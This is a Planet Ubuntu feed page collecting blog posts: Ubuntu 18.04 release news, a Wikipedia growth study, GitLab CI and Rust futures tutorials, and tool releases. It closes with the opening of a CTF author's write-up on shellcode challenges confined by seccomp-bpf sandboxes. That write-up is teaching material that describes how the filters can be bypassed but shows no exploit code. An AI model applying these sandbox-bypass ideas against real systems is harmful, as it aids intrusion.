Most recent items from Ubuntu feeds:
The Fridge: Ubuntu Weekly Newsletter Issue 524 from Planet Ubuntu

Welcome to the Ubuntu Weekly Newsletter, Issue 524 for the week of April 15 – 21, 2018 – the full version is available here.
In this issue we cover:

Bionic Beaver (18.04 LTS) Final Freeze
First set of Bionic (sort-of) RC images
Ubuntu Stats
Hot in Support
UbuCon Europe 2018 | 1 Week to go!!
LoCo Events
Help test memory leaks fixes in 18.04 LTS
This Week in Lubuntu Development #3
Xfce Component Updates and More
Welcome To The (Ubuntu) Bionic Age: Interviewing people behind Communitheme
Collaboration Conference (at Open Source Summit) Call For Papers
MAAS 2.4.0 beta 2 released!
gksu removed from Ubuntu
Other Community News
Canonical News
In the Press
In the Blogosphere
Other Articles of Interest
Featured Audio and Video
Weekly Ubuntu Development Team Meetings
Upcoming Meetings and Events
Updates and Security for 14.04, 16.04, and 17.04
And much more!

The Ubuntu Weekly Newsletter is brought to you by:

Krytarik Raido
Wild Man
Athul Muralidhar
And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!
Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

about 3 hours ago

Benjamin Mako Hill: Is English Wikipedia’s ‘rise and decline’ typical? from Planet Ubuntu

This graph shows the number of people contributing to Wikipedia over time:
<figure class="wp-caption aligncenter" id="attachment_348" style="width: 1500px;">The number of active Wikipedia contributors exploded, suddenly stalled, and then began gradually declining. (Figure taken from Halfaker et al. 2013)</figure>
The figure comes from “The Rise and Decline of an Open Collaboration System,” a well-known 2013 paper that argued that Wikipedia’s transition from rapid growth to slow decline in 2007 was driven by an increase in quality control systems. Although many people have treated the paper’s finding as representative of broader patterns in online communities, Wikipedia is a very unusual community in many respects. Do other online communities follow Wikipedia’s pattern of rise and decline? Does increased use of quality control systems coincide with community decline elsewhere?
In a paper that my student Nathan TeBlunthuis is presenting Thursday morning at the Association for Computing Machinery (ACM) Conference on Human Factors in Computing Systems (CHI),  a group of us have replicated and extended the 2013 paper’s analysis in 769 other large wikis. We find that the dynamics observed in Wikipedia are a strikingly good description of the average Wikia wiki. They appear to reoccur again and again in many communities.
The original “Rise and Decline” paper (we’ll abbreviate it “RAD”) was written by Aaron Halfaker, R. Stuart Geiger, Jonathan T. Morgan, and John Riedl. They analyzed data from English Wikipedia and found that Wikipedia’s transition from rise to decline was accompanied by increasing rates of newcomer rejection as well as the growth of bots and algorithmic quality control tools. They also showed that newcomers whose contributions were rejected were less likely to continue editing and that community policies and norms became more difficult to change over time, especially for newer editors.
Our paper, just published in the CHI 2018 proceedings, replicates most of RAD’s analysis on a dataset of 769 of the  largest wikis from Wikia that were active between 2002 to 2010.  We find that RAD’s findings generalize to this large and diverse sample of communities.
We can walk you through some of the key findings. First, the growth trajectory of the average wiki in our sample is similar to that of English Wikipedia. As shown in the figure below, an initial period of growth stabilizes and leads to decline several years later.
<figure class="wp-caption aligncenter" id="attachment_516" style="width: 1174px;">The average Wikia wikia also experience a period of growth followed by stabilization and decline (from TeBlunthuis, Shaw, and Hill 2018).</figure>
We also found that newcomers on Wikia wikis were reverted more and continued editing less. As on Wikipedia, the two processes were related. Similar to RAD, we also found that newer editors were more likely to have their contributions to the “project namespace” (where policy pages are located) undone as wikis got older. Indeed, the specific estimates from our statistical models are very similar to RAD’s for most of these findings!
There were some parts of the RAD analysis that we couldn’t reproduce in our context. For example, there are not enough bots or algorithmic editing tools in Wikia to support statistical claims about their effects on newcomers.
At the same time, we were able to do some things that the RAD authors could not.  Most importantly, our findings discount some Wikipedia-specific explanations for a rise and decline. For example, English Wikipedia’s decline coincided with the rise of Facebook, smartphones, and other social media platforms. In theory, any of these factors could have caused the decline. Because the wikis in our sample experienced rises and declines at similar points in their life-cycle but at different points in time, the rise and decline findings we report seem unlikely to be caused by underlying temporal trends.
The big communities we study seem to have consistent “life cycles” where stabilization and/or decay follows an initial period of growth. The fact that the same kinds of patterns happen on English Wikipedia and other online groups implies a more general set of social dynamics at work that we do not think existing research (including ours) explains in a satisfying way. What drives the rise and decline of communities more generally? Our findings make it clear that this is a big, important question that deserves more attention.
We hope you’ll read the paper and get in touch by commenting on this post or emailing Nate if you’d like to learn or talk more. The paper is available online and has been published under an open access license. If you really want to get into the weeds of the analysis, we will soon publish all the data and code necessary to reproduce our work in a repository on the Harvard Dataverse.
Nate TeBlunthuis will be presenting the project this week at CHI in Montréal on Thursday April 26 at 9am in room 517D.  For those of you not familiar with CHI, it is the top venue for Human-Computer Interaction. All CHI submissions go through double-blind peer review and the papers that make it into the proceedings are considered published (same as journal articles in most other scientific fields). Please feel free to cite our paper and send it around to your friends!

This blog post, and the open access paper that it describes, is a collaborative project with Aaron Shaw, that was led by Nate TeBlunthuis. A version of this blog post was originally posted on the Community Data Science Collective blog. Financial support came from the US National Science Foundation (grants IIS-1617129,  IIS-1617468, and GRFP-2016220885 ), Northwestern University, the Center for Advanced Study in the Behavioral Sciences at Stanford University, and the University of Washington. This project was completed using the Hyak high performance computing cluster at the University of Washington.

about 4 hours ago

Lubuntu Blog: This Week in Lubuntu Development #4 from Planet Ubuntu

Here is the fourth issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. You can see the commits she has made here. We need your help with the Lubuntu Manual! Take a look at […]

about 9 hours ago

Riccardo Padovani: AWS S3 + GitLab CI = automatic deploy for every branch of your static website from Planet Ubuntu

You have a static website and you want to share to your team the last changes
you have done, before going online! How to do so?

If you use GitLab and you have an account AWS, it’s time to step up
your game and automatize everything. We are going to setup a system which will
deploy every branch you create to S3, and clean up after yourself when the
branch is merged or deleted.

AWS S3 is just a storage container, so of course you can’t host in this way a
dynamic website, but for a static one (as this blog), it is perfect.

Also, please note that AWS S3 buckets for hosting a website are public, and
while you need to know the URL to access it, there are way to list them. So do
not set up this system if you have private data on your website.

Of course, standard S3 prices will apply.

We will use GitLab CI, since it is shipped with GitLab and deeply
integrated with it.

Gitlab CI is a very powerful system of Continuous Integration, with a lot of
different features, and with every new releases, new features land. It has a
rich technical documentation that I suggest you reading.

If you want to know why Continuous Integration is important I suggest reading
this article, while for finding the reasons for using Gitlab CI
specifically, I leave the job to itself. I’ve also
written another article with a small introduction to Gitlab

I suppose you already have an AWS account and you know a bit how GitLab CI
works. If not, please create an account and read some of the links above to
learn about GitLab CI.

Setting up AWS

First thing is setting up AWS S3 and a dedicated IAM user to push to S3.

Since every developer with permissions to push to the repository will have
access to the tokens of the IAM use, it is better to limit its permissions as
much as possible.

Setting up S3

To set up S3, go to S3 control panel, create a new bucket, choose a name
(from now on, I will use example-bucket) and a region, and finish the
creation leaving the default settings.

After that, you need to enable the website management: go to Bucket ->
Properties and enable Static website hosting, selecting Use this bucket
to host a website as in the image. As index, put index.html - you can then
upload a landing page there, if you want.

Take note of the bucket’s URL, we will need it.

We now grant permissions to read objects to everybody; we will use the policy
described in the AWS guide. For other information on how
to host a static website, please follow the official documentation.

To grant the read permissions, go to Permissions->Bucket policy and insert:

"Principal": "*",

Of course, you need to insert your bucket’s name in the Resource line.

Creating the IAM user

Now we need to create the IAM user that will upload content to the S3 bucket,
with a policy that allows only upload to our GitLab bucket.

Go to IAM and create a new policy, with the name you prefer:

"Version": "2012-10-17",
"Statement": [
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"Resource": "arn:aws:s3:::example-bucket/*"
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListObjects",
"Resource": "*"

Of course, again, you should change the Resource field to the name of your
bucket. If you know the GitLab runners’ IPs, you can restrict the policy to that

Now you can create a new user granting it Programmatic access. I will call
it gitlabs3uploader. Assign it the policy we just created.

For more information on how to manage multiple AWS accounts for security
reasons, I leave you to the official guide.

Setting up GitLab CI

We need to inject the credentials in the GitLab runner. Go to your project,
Settings -> CI / CD -> Secret variables and set two variables:

AWS_ACCESS_KEY_ID with the new user’s access key
AWS_SECRET_ACCESS_KEY with the new user’s access secret key

Since we want to publish every branch, we do not set them as protected,
because they need to be available in every branch.


We now need to explain GitLab how to publish the website. If you need to build
it before, you can do so. uses Jekyll, so my .gitlab-ci.yml
file is like this:

image: "" # Custom Ruby image, replace with whatever you want
- build
- deploy

AWS_DEFAULT_REGION: eu-central-1 # The region of our S3 bucket
BUCKET_NAME: bucket-name # Your bucket name

- vendor

buildJekyll: # A job to build the static website - replace it with your build methods
stage: build
- bundle install --path=vendor/
- bundle exec jekyll build --future # The server is in another timezone..
- _site/ # This is what we want to publish, replace with your `dist` directory

image: "python:latest" # We use python because there is a well-working AWS Sdk
stage: deploy
- buildJekyll # We want to specify dependencies in an explicit way, to avoid confusion if there are different build jobs
- pip install awscli # Install the SDK
- aws s3 cp _site s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
url: http://${BUCKET_NAME}${CI_COMMIT_REF_SLUG} # This is the url of the bucket we saved before
on_stop: clean_s3 # When the branch is merged, we clean up after ourself

image: "python:latest"
stage: deploy
- pip install awscli
- aws s3 rm s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
action: stop
when: manual

For more information about dynamic environments, see the documentation.

To verify your .gitlab-ci.yml is correct, go to your project on GitLab, then
CI / CD -> Pipelines, and in the top right of the page there is a CI
Lint link. It does not only lint your code, but it also creates a nice
overview of all your jobs.

Thanks to the environments, we will have the link to the test deployment
directly in the merge request, so your QA team, and every other stakeholder
interested in seeing the website before going to production, can do it directly
from GitLab.

Also, after you merge your branch, GitLab will clean after itself, so you do not
have useless websites in S3.

You can also see all the deployments in CI / CD -> Environments, and
trigger new deploys.


They say 2018 is the year for DevOps. I am not sure about that,
but I am sure that a well configured Continuous Integration and Continuous
Delivery system save you and your company a lot of time and headaches.

If your builds are perfectly reproducibly, and everything is
automatic, you can focus on what really matters: developing solutions for your

This was a small example on how to integrate AWS and GitLab, but you know the
only limit is your fantasy. Also, a lot of new features are introduced every
month in Gitlab and GitLab CI, so keep an eye on the Gitlab blog.

Kudos to the Gitlab team (and others guys who help in their free time) for their
awesome work!

If you have any question or feedback about this blog post, please drop me an
email at or tweet me :-)
Feel free to suggest me to add something, or to rephrase paragraphs in a clearer
way (English is not my mother tongue).

Bye for now,

P.S: if you have found this article helpful and you’d like I write others, do
you mind to help me reaching the Ballmer’s peak and buyme
a beer?

about 11 hours ago

Sebastian Dröge: GLib/GIO async operations and Rust futures + async/await from Planet Ubuntu

Unfortunately I was not able to attend the Rust+GNOME hackfest in Madrid last week, but I could at least spend some of my work time at Centricular on implementing one of the things I wanted to work on during the hackfest. The other one, more closely related to the gnome-class work, will be the topic of a future blog post once I actually have something to show.
So back to the topic. With the latest GIT version of the Rust bindings for GLib, GTK, etc it is now possible to make use of the Rust futures infrastructure for GIO async operations and various other functions. This should make writing of GNOME, and in general GLib-using, applications in Rust quite a bit more convenient.
For the impatient, the summary is that you can use Rust futures with GLib and GIO now, that it works both on the stable and nightly version of the compiler, and with the nightly version of the compiler it is also possible to use async/await. An example with the latter can be found here, and an example just using futures without async/await here.
Table of Contents


Futures in Rust

Futures & GLib/GIO

GLib Futures
GIO Asynchronous Operations

The Future

First of all, what are futures and how do they work in Rust. In a few words, a future (also called promise elsewhere) is a value that represents the result of an asynchronous operation, e.g. establishing a TCP connection. The operation itself (usually) runs in the background, and only once the operation is finished (or fails), the future resolves to the result of that operation. There are all kinds of ways to combine futures, e.g. to execute some other (potentially async) code with the result once the first operation has finished.
It’s a concept that is also widely used in various other programming languages (e.g. C#, JavaScript, Python, …) for asynchronous programming and can probably be considered a proven concept at this point.
Futures in Rust
In Rust, a future is basically an implementation of relatively simple trait called Future. The following is the definition as of now, but there are discussions to change/simplify/generalize it currently and to also move it to the Rust standard library:
pub trait Future {
type Item;
type Error;

fn poll(&mut self, cx: &mut task::Context) -> Poll<Self::Item, Self::Error>;
Anything that implements this trait can be considered an asynchronous operation that resolves to either an Item or an Error. Consumers of the future would call the poll method to check if the future has resolved already (to a result or error), or if the future is not ready yet. In case of the latter, the future itself would at a later point, once it is ready to proceed, notify the consumer about that. It would get a way for notifications from the Context that is passed, and proceeding does not necessarily mean that the future will resolve after this but it could just advance its internal state closer to the final resolution.
Calling poll manually is kind of inconvenient, so generally this is handled by an Executor on which the futures are scheduled and which is running them until their resolution. Equally, it’s inconvenient to have to implement that trait directly so for most common operations there are combinators that can be used on futures to build new futures, usually via closures in one way or another. For example the following would run the passed closure with the successful result of the future, and then have it return another future (Ok(()) is converted via IntoFuture to the future that always resolves successfully with ()), and also maps any errors to ()
fn our_future() -> impl Future<Item = (), Err = ()> {
.and_then(|res| {
.map_err(|_| ())
A future represents only a single value, but there is also a trait for something producing multiple values: a Stream. For more details, best to check the documentation.
The above way of combining futures via combinators and closures is still not too great, and is still close to callback hell. In other languages (e.g. C#, JavaScript, Python, …) this was solved by introducing new features to the language: async for declaring futures with normal code flow, and await for suspending execution transparently and resuming at that point in the code with the result of a future.
Of course this was also implemented in Rust. Currently based on procedural macros, but there are discussions to actually move this also directly into the language and standard library.
The above example would look something like the following with the current version of the macros
fn our_future() -> Result<(), ()> {
let res = await!(some_future)
.map_err(|_| ())?;

This looks almost like normal, synchronous code but is internally converted into a future and completely asynchronous.
Unfortunately this is currently only available on the nightly version of Rust until various bits and pieces get stabilized.
Most of the time when people talk about futures in Rust, they implicitly also mean Tokio. Tokio is a pure Rust, cross-platform asynchronous IO library and based on the futures abstraction above. It provides a futures executor and various types for asynchronous IO, e.g. sockets and socket streams.
But while Tokio is a great library, we’re not going to use it here and instead implement a futures executor around GLib. And on top of that implement various futures, also around GLib’s sister library GIO, which is providing lots of API for synchronous and asynchronous IO.
Just like all IO operations in Tokio, all GLib/GIO asynchronous operations are dependent on running with their respective event loop (i.e. the futures executor) and while it’s possible to use both in the same process, each operation has to be scheduled on the correct one.
Futures & GLib/GIO
Asynchronous operations and generally everything event related (timeouts, …) are based on callbacks that you have to register, and are running via a GMainLoop that is executing events from a GMainContext. The latter is just something that stores everything that is scheduled and provides API for polling if something is ready to be executed now, while the former does exactly that: executing.
The callback based API is also available via the Rust bindings, and would for example look as follows
glib::timeout_add(20, || {
glib::Continue(false) // don't call again

glib::idle_add(|| {
glib::Continue(false) // don't call again

some_async_operation(|res| {
match res {
Err(err) => report_error_somehow(),
Ok(res) => {
some_other_async_operation(|res| {
As can be seen here already, the callback-based approach leads to quite non-linear code and deep indentation due to all the closures. Also error handling becomes quite tricky due to somehow having handle them from a completely different call stack.
Compared to C this is still far more convenient due to actually having closures that can capture their environment, but we can definitely do better in Rust.
The above code also assumes that somewhere a main loop is running on the default main context, which could be achieved with the following e.g. inside main()
let ctx = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&ctx), false);

// All operations here would be scheduled on this main context

// Run everything until someone calls l.quit();
It is also possible to explicitly select for various operations on which main context they should run, but that’s just a minor detail.
GLib Futures
To make this situation a bit nicer, I’ve implemented support for futures in the Rust bindings. This means, that the GLib MainContext is now a futures executor (and arbitrary futures can be scheduled on it), all the GSource related operations in GLib (timeouts, UNIX signals, …) have futures- or stream-based variants and all the GIO asynchronous operations also come with futures variants now. The latter are autogenerated with the gir bindings code generator.
For enabling usage of this, the futures feature of the glib and gio crates have to be enabled, but that’s about it. It is currently still hidden behind a feature gate because the futures infrastructure is still going to go through some API incompatible changes in the near future.
So let’s take a look at how to use it. First of all, setting up the main context and executing a trivial future on it
let c = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&c), false);


// Spawn a future that is called from the main context
// and after printing something just quits the main loop
let l_clone = l.clone();
c.spawn(futures::lazy(move |_| {
println!("we're called from the main context");

Apart from spawn(), there is also a spawn_local(). The former can be called from any thread but requires the future to implement the Send trait (that is, it must be safe to send it to other threads) while the latter can only be called from the thread that owns the main context but it allows any kind of future to be spawned. In addition there is also a block_on() function on the main context, which allows to run non-static futures up to their completion and returns their result. The spawn functions only work with static futures (i.e. they have no references to any stack frame) and requires the futures to be infallible and resolve to ().
The above code already showed one of the advantages of using futures: it is possible to use all generic futures (that don’t require a specific executor), like futures::lazy or the mpsc/oneshot channels with GLib now. And any of the combinators that are available on futures
let c = MainContext::new();

let res = c.block_on(timeout_future(20)
.and_then(move |_| {
// Called after 20ms

assert_eq!(res, Ok(1));
This example also shows the block_on functionality to return an actual value from the future (1 in this case).
GIO Asynchronous Operations
Similarly, all asynchronous GIO operations are now available as futures. For example to open a file asynchronously and getting a gio::InputStream to read from, the following could be done
let file = gio::File::new_for_path("Cargo.toml");

let l_clone = l.clone();
// Try to open the file
.map_err(|(_file, err)| {
format!("Failed to open file: {}", err)
.and_then(move |(_file, strm)| {
// Here we could now read from the stream, but
// instead we just quit the main loop

A bigger example can be found in the gtk-rs examples repository here. This example is basically reading a file asynchronously in 64 byte chunks and printing it to stdout, then closing the file.
In the same way, network operations or any other asynchronous operation can be handled via futures now.
Compared to a callback-based approach, that bigger example is already a lot nicer but still quite heavy to read. With the async/await extension that I mentioned above already, the code looks much nicer in comparison and really almost like synchronous code. Except that it is not synchronous.
fn read_file(file: gio::File) -> Result<(), String> {
// Try to open the file
let (_file, strm) = await!(file.read_async_future(glib::PRIORITY_DEFAULT))
.map_err(|(_file, err)| format!("Failed to open file: {}", err))?;


fn main() {
let future = async_block! {
match await!(read_file(file)) {
Ok(()) => (),
Err(err) => eprintln!("Got error: {}", err),

For compiling this code, the futures-nightly feature has to be enabled for the glib crate, and a nightly compiler must be used.
The bigger example from before with async/await can be found here.
With this we’re already very close in Rust to having the same convenience as in other languages with asynchronous programming. And also it is very similar to what is possible in Vala with GIO asynchronous operations.
The Future
For now this is all finished and available from GIT of the glib and gio crates. This will have to be updated in the future whenever the futures API is changing, but it is planned to stabilize all this in Rust until the end of this year.
In the future it might also make sense to add futures variants for all the GObject signal handlers, so that e.g. handling a click on a GTK+ button could be done similarly from a future (or rather from a Stream as a signal can be emitted multiple times). If this is in the end more convenient than the callback-based approach that is currently used, is to be seen. Some experimentation would be necessary here. Also how to handle return values of signal handlers would have to be figured out.

about 16 hours ago

Jorge Castro: How to video conference without people hating you from Planet Ubuntu

While video conferencing has been a real boost to productivity there are still lots of things that can go wrong during a conference video call.

There are some things that are just plain out of your control, but there are some things that you can control. So, after doing these for the past 15 years or so, here are some tips if you’re just getting into remote work and want to do a better job. Of course I have been guilty of all of these. :D

Stuff to have

Get a Microphone - Other than my desk, chair, and good monitors, this is the number one upgrade you can do. Sound is one of those things that can immediately change the quality of your call. I use a Blue Yeti due to the simplicity of using USB audio, and having a hardware mute button. This way I know for sure I am muted when there’s a blinking red light in my face. Learn to use your microphone. On my Yeti you speak across the microphone and it has settings for where to pick up the noise from. Adjust these so it sounds correct. Get a pop filter.

A Video Camera - Notice I put this second. I can get over a crappy image if the audio is good. The Logitech C-900 series has been my long go to standard for this. It also has dual noise cancelling microphones, which are great for backup (if you’re on a trip), but I will always default to the dedicated microphone.

A decent set of headphones - Personal preference. I like open back ones when I’m working from home but pack a noise cancelling set for when I am on the road.

What about an integrated headset and microphone? This totally depends on the type. I tend to prefer the full sound of a real microphone but the boom mics on some of these headsets are quite good. If you have awesome heaphones already you can add a modmic to turn them into headsets. I find that even the most budget dedicated headsets sound better than earbud microphones.

Stuff to get rid of

Your shitty earbuds - Seriously. If you’re going to be a remote worker invest in respecting your coworker’s time. A full hour long design session with you holding up a junky earbud microphone up to your face is not awesome for anybody. They’re fine if you want to use them for listening, but don’t use the mic.

“But this iPhone was $1000, my earbud mic is fine.” Nope. You sound like crap.

Garbage habits we all hate

If you’re just dialing in to listen then most of these won’t apply to you, however …

Always join on muted audio. If the platform you use doesn’t do this by default, find this setting and enable it.

If you don’t have anything to say at that moment, MUTE. Even if you are just sitting there you’re adding ambient noise to the meeting, and when it gets over 10 people this really, really, sucks. This is why I love having a physical mute button, you can always be sure at a glance without digging into settings. I’ve also used a USB switch pedal for mute with limited success.

Jumping in from a coffee shop, your work’s cafeteria, or any other place where there’s noise is not cool. And if you work in an open office all you’re doing is broadcasting to everyone else in the room that your place of employment doesn’t take developer productivity seriously.

“Oh I will use my external speakers and built in microphone and adjust the levels and it will sound fine.” - No, it won’t, you sound like a hot mess, put on your headset and use the microphone.

If you use your built-in microphone on your laptop and you start typing while you are talking EVERYBODY WILL HATE YOU.

If you’re going to dial in from the back on an Uber or from a bus, and you have to talk or present, just don’t come. Ask someone to run the meeting for you or reschedule. You’re just wasting everyone’s time if you think we want to hear you sprinting down a terminal to catch your flight.

And if you’re that person sitting on the plane in the meeting and people have to hear whatever thing you’re working on, they will hate you for the entire flight.

Treat video conferencing like you do everything else at work

We invest in our computers and our developer tools, so it’s important to think seriously about putting your video conferencing footprint in that namespace. There is a good chance no one will notice that you always sound good, but it’s one of those background quality things that just makes everyone more productive. Besides, think of the money you’ve spent on your laptop and everything else to make you better at work, better audio gear is a good investment.

In the real world, sometimes you just have to travel and you find yourself stuck on a laptop on hotel wireless in a corner trying to your job, but I strive to make that situation the exception!

1 day ago

Sean Davis: MenuLibre 2.2.0 Released from Planet Ubuntu

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.
What’s New?
Since MenuLibre 2.0.7, the previous stable release.

Support for Budgie, Cinnamon, EDE, KDE Plasma, LXQt, MATE, and Pantheon desktop environments
Version 1.1 of the Desktop Entry specification is now supported
Improved KeyFile backend for better file support

New Features

Integrated window identification for the StartupWmClass key
New dialog and notification for reviewing invalid desktop entries
New button to test launchers without saving
New button to sort menu directory contents alphabetically
Subdirectories can now be added to preinstalled system paths
Menu updates are now delayed to prevent file writing collisions

Interface Updates

New layout preferences! Budgie, GNOME, and Pantheon utilize client side decorations (CSD) while other desktops continue to use server side decorations (SSD) with a toolbar and menu.

Want to switch? The -b and -t commandline flags allow you to set your preference.

Simplified and easier-to-use widgets for Name, Comment, DBusActivatable, Executable, Hidden, Icon, and Working Directory keys
Hidden items are now italicized in the treeview
Directories are now represented by the folder icon
Updated application icon

Source tarball (md5, sig)
Available on Debian Testing/Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

1 day ago

Sean Davis: Mugshot 0.4.0 Released from Planet Ubuntu

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).
What’s New?
Since Mugshot 0.2.5, the previous stable release.

Improved camera support, powered by Cheese and Clutter
AccountsService integration for more reliable user detail parsing
Numerous bug fixes with file access, parsing, and permissions
Translation updates for Brazilian Portuguese, Catalan, Croatian, Czech, Danish, Dutch, Finnish, French, German, Greek, Icelandic, Italian, Lithuanian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, and Swedish

Source tarball (md5, sig)
Available in Debian Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

1 day ago

Ubuntu Studio: Ubuntu Studio 18.04 Release Candidate from Planet Ubuntu

The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here There are some known issues: Volume label still set to Beta base-files still not the final version kernel will have (at least) one more revision Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]

2 days ago

Kubuntu General News: Bionic (18.04) Release Candidate images ready for testing! from Planet Ubuntu

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.
The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.
This is the first spin of a release candiate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.
Kubuntu Beta pre-releases are NOT recommended for:

Regular users who are not aware of pre-release issue
Anyone who needs a stable system
Anyone uncomfortable running a possibly frequently broken system
Anyone in a production environment with data or workflows that need to be reliable

Kubuntu Beta pre-releases are recommended for:

Regular users who want to help us test by finding, reporting, and/or fixing bugs
Kubuntu, KDE, and Qt developers

Getting Kubuntu 18.04 RC testing images:
To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.
Download a Bootable image and put it onto a DVD or USB Drive via the download link at
This is also the direct link to report your findings and any bug reports you file.
See our release notes:
Please report your results on the Release tracker.

2 days ago

Gustavo Silva: Why Everyone should know vim from Planet Ubuntu

Vim is an improved version of Vi, a known text editor available by default in UNIX distributions. Another alternative for modal editors is Emacs but they’re so different that I kind of feel they serve different purposes. Both are great, regardless.

I don’t feel vim is necessarily a geeky kind of taste or not. Vim introduced modal editing to me and that has changed my life, really. If you have ever tried vim, you may have noticed you have to press “I” or “A” (lower case) to start writing (note: I’m aware there are more ways to start editing but the purpose is not to cover Vim’s functionalities.). The fun part starts once you realize you can associate Insert and Append commands to something. And then editing text is like thinking of what you want the computer to show on the computer instead of struggling where you at before writing. The same goes for other commands which are easily converted to mnemonics and this is what helped getting comfortable with Vim. Note that Emacs does not have this kind of keybindings but they do have a Vim-like mode - Evil (Extensive Vi Layer).
More often than not, I just need to think of what I want to accomplish and type the first letters. Like Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has modes for everything. This is also what increases my productivity when writing files. I just think of my intentions and Vim does the things for me.

Here’s another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged)

In a non-modal editing text editor, you would need to pick your mouse, select the text carefully inside the parenthesis (you might be able to double click the text and it would highlight it) and then delete, write all over, etc. In Vim, there are basically two options to do that. You can type di( and that would d\elete i\nside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( would actually change i\nside the symbol by deleting and changing to insert mode automatically.

Vim has a significant learning curve, I’m aware of that. Many people get discouraged on the first try but sticking to Vim has changed how I perceive text writing and I know, for sure, it has been a positive change. I write faster, editing is an instant, I don’t need the mouse for anything at all, vim starts instantly and many other cool features. For those looking for customization, Vim is fully customizable without causing too much of a load in your CPU, like it happens in Atom. Vim is also easily accessible anywhere. Take IntelliJ for example, a Java IDE multi-platform. It even recommends installing the Vim plugin right-after the installation process. Obviously, I did it. In an UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and it can make you more productive. But modal editing got me addicted to this. I can’t install an IDE without looking for vim extensions.

I would like everyone to try Vi’s modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I’m 150% positive you will find an answer. As time goes by, I’m positive you will find out features of vim you didn’t even know it was possible.

Thanks for reading.


2 days ago

Benjamin Mako Hill: Mako Hate from Planet Ubuntu

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for “Mako.”
Two tags with examples are #mako hate and #anti mako but there are many others.
<figure class="wp-caption aligncenter" id="attachment_2955" style="width: 640px;">“even Mako hates Mako…” meme. Found on this forum thread.</figure>
I’ve also discovered Tumblrs entirely dedicated to the topic!
For example, Let’s Roast Mako describes itself “A place to beat up Mako. In peace. It’s an inspiration to everyone!”
The second is the Fuck Mako Blog which describes itself with series of tag-lines including “Mako can fuck right off and we’re really not sorry about that,” “Welcome aboard the SS Fuck-Mako;” and “Because Mako is unnecessary.” Sub-pages of the site include:

The Anti-Mako Armada: “This armada sails itself.”
A collection of Anti-Mako essays

I’ll admit I’m a little disquieted.

2 days ago

David Tomaschik: BSidesSF CTF 2018: Coder Series (Author's PoV) from Planet Ubuntu


As the author of the “coder” series of challenges (Intel Coder, ARM Coder, Poly
Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my
perspective on the challenges. I can’t tell if the challenges were
uninteresting, too hard, or both, but they were solved by far fewer teams than I
had expected. (And than we had rated the challenges for when scoring them.)

The entire series of challenges were based on the premise “give me your
shellcode and I’ll run it”, but with some limitations. Rather than forcing
players to find and exploit a vulnerability, we wanted to teach players about
dealing with restricted environments like sandboxes, unusual architectures, and
situations where your shellcode might be manipulated by the process before it


Each challenge requested the length of your shellcode followed by the shellcode
and allowed for ~1k of shellcode (which is more than enough for any reasonable
exploitation effort on these). Shellcode was placed into newly-allocated memory
with RWX permissions, with a guard page above and below. A new stack was
allocated similarly, but without the execute bit set.

Each challenge got a seccomp-bpf sandbox setup, with slight variations in the
limitations of the sandbox to encourage players to look into how the sandbox is

All challenges allowed rt_sigreturn(), exit(), exit_group() and
close() for housekeeping purposes.
Intel Coder allowed open() (with limited arguments) and sendfile().
ARM Coder allowed open(), read(), and write(), all with limited
Poly Coder allowed read() and write(), but the file descriptors were
already opened for the player.
OCD Coder allowed open(), read(), write() and sendfile() with

The shellcode was then executed by a helper function written in assembly. (To
swap the stack then execute the shellcode.)

There were a few things that made these challenges harder than they might have
otherwise been:

Stripped binaries
PIE binaries and ASLR
Statically linking libseccomp (although I thought I was doing players a
favor with this, it does make the binary much larger)

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to
use a small subset of syscalls. seccomp-bpf extended this to use Berkeley
Packet Filters (BPF) to allow for filtering system calls. The system call
number and arguments (from registers) are placed into a structure, and the BPF
is used to filter this structure. The filter can result in allowing or denying
the syscall, and on a denied syscall, an error may be returned, a signal may be
delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows
for filtering not only based on the system call itself, but on the arguments
passed to the system call. One quirk of this is that it is completely unaware
of the types of the arguments, and only operates on the contents of the
registers used for passing arguments. Consequently, pointer types are compared
by the pointer value and not by the contents pointed to. I actually
hadn’t thought about this before writing this challenge and limiting the values
passed to open(). All of the challenges allowing open limited it to
./flag.txt, so not only could you only open that one file, you could only do
it by using the same pointer that was passed to the library functions that setup
the filtering.

An interesting corollary is that if you limit system call arguments by passing
in a pointer value, you probably want it to be a global, and you probably don’t
want it to be in writable memory, so that an attacker can’t overwrite the
